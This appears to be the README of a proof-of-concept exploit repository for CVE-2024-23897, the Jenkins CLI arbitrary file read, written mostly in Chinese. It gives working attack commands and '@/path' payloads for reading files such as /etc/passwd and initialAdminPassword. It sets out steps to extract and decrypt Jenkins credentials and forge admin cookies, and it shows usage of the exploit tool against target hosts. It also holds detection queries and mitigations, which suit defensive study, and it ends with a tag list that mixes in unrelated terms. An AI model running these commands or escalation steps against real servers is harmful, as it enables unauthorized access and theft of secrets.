vmc8ll/poc-CVE-2024-23897

# POC-CVE-2024-23897 CVE-2024-23897：Jenkins 任意文件读取导致 RCE 🎯 受影响的产品及版本 ``` Product: Jenkins (Continuous Integration/Continuous Delivery server) Versions: Jenkins 2.441 and earlier, Jenkins LTS 2.426.2 and earlier Fixed in: Jenkins 2.442, Jenkins LTS 2.426.3 ``` 📝 描述 CVE-2024-23897 是 Jenkins 中的一个严重漏洞，允许未经身份验证的攻击者读取 Jenkins controller 文件系统上的任意文件。该漏洞的存在是因为 Jenkins 未禁用其 CLI 命令解析器中的一个功能，该功能会将 '@' 字符后跟文件路径替换为该文件的内容。 当与其他技术结合使用时，此缺陷可能导致远程代码执行 (RCE)，这使得在 CI/CD 流水线中使用 Jenkins 的组织面临特别大的风险。 🔍 漏洞详情 根本原因 该漏洞源于 `org.kohsuke.args4j.CmdLineParser` 类中的 `expandAtFiles()` 函数。在解析 CLI 参数时，如果解析器遇到 '@' 符号后跟文件路径，它会读取并展开该文件的内容。 攻击向量 攻击者可以在未经身份验证的情况下利用 Jenkins CLI 接口利用此漏洞： bash java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ help @/etc/passwd 技术分析 文件读取限制 ``` Without authentication: Only first 3 lines of the file can be read (depending on CLI command) With 'Overall/Read' permission: Full file content can be read Binary files: Can be extracted but may be affected by encoding issues (Windows-1252 on Windows yields better results than UTF-8 on Linux) ``` 攻击面扩展 一旦实现文件读取，攻击者可以升级到更严重的攻击： ``` Extract Credentials: Read /var/jenkins_home/credentials.xml for encrypted credentials Read /var/jenkins_home/secrets/master.key and hudson.util.Secret for decryption Decrypt credentials using Jenkins script console: println(Hudson.util.Secret.fromString("{XXX=}").getPlainText()) Forge "Remember-me" Cookies: Obtain administrative access by forging authentication cookies Execute Arbitrary Code: Achieve RCE through Resource Root URL, XSS, or CSRF vectors ``` 💥 影响 直接影响 ``` Confidentiality: Complete disclosure of all files on Jenkins server (source code, credentials, SSH keys, tokens) Integrity: Attackers can modify builds, pipelines, and configurations Availability: Potential for denial of service or ransomware deployment ``` 现实世界中的利用 此漏洞已在野外被积极利用： ``` Added to CISA Known Exploited Vulnerabilities (KEV) catalog Used by ransomware gangs (RansomEXX) to compromise infrastructure Exploited by threat actor IntelBroker to steal GitHub repositories and compromise IT service providers ``` 🔧 检测 入侵指标 可以通过以下方式检测成功的利用尝试： HTTP 请求模式： text POST /cli?remoting=false HTTP/1.1 Content-type: application/octet-stream [包含 @/path/to/file 的二进制 payload] 典型 Payload 示例： ``` @/etc/passwd @/var/jenkins_home/secrets/initialAdminPassword @/etc/os-release ``` Splunk 检测查询 text index=web uri="*/cli?remoting=false*" http_method=POST http_status=200 🛡️ 缓解措施 官方修复 升级到已修复版本： ``` Jenkins ≥ 2.442 Jenkins LTS ≥ 2.426.3 ``` 临时缓解 如果无法立即打补丁： ``` Disable Jenkins CLI access Set Java system property: hudson.cli.CLICommand.allowAtSyntax=false Restrict network access to Jenkins admin interface Implement WAF rules to block requests containing @/ patterns ``` 🔗 参考资料 ``` NVD Entry Jenkins Security Advisory CISA KEV Catalog Splunk Research Tenable CVE Page 📦 Building and Running ``` bash # 构建漏洞利用程序 go build -o jenkins-cve-2024-23897 exploit.go # 运行漏洞利用程序 ./jenkins-cve-2024-23897 http://target-jenkins:8080 /etc/passwd # 直接使用 Go 运行 go run exploit.go http://target-jenkins:8080 /etc/passwd 🎯 使用示例 bash # 读取敏感文件 ./jenkins-cve-2024-23897 http://jenkins.internal:8080 /etc/passwd ./jenkins-cve-2024-23897 http://localhost:8080 /var/jenkins_home/secrets/initialAdminPassword # 读取 Windows 文件（如果 Jenkins 运行在 Windows 上） ./jenkins-cve-2024-23897 http://win-jenkins:8080 C:/Windows/win.ini ⚙️ 工作原理 ``` Session Initialization: Generates a unique 20-byte session ID Payload Construction: Builds binary payload with help @/path/to/file structure Upload Phase: Sends payload to Jenkins CLI endpoint Download Phase: Retrieves file content from the response Output: Displays the file content or error message ``` 📊 功能特性 ``` Pure Go implementation - No external dependencies Cross-platform - Works on Windows, Linux, macOS Configurable timeouts - Adjustable for slow networks Clean error handling - Detailed error messages Binary-safe - Handles both text and binary files ``` ⚠️ 重要说明 ``` Educational purposes only - Use only on systems you own or have permission to test Unauthenticated reads - Without authentication, only first ~3 lines are readable Binary files - May be affected by encoding issues (use Windows target for better binary extraction) ```

标签：0day, 1day, Args4j漏洞, CI/CD安全, CVE-2024-23897, DevSecOps, EVTX分析, HTTP工具, Jenkins, Llama, OPA, PE 加载器, PoC, RCE, SDLC, StruQ, 上游代理, 中间件漏洞, 人体姿态估计, 任意文件读取, 凭据窃取, 日志审计, 暴力破解, 未授权访问, 编程工具, 网络安全, 网络安全审计, 远程代码执行, 隐私保护, 靶场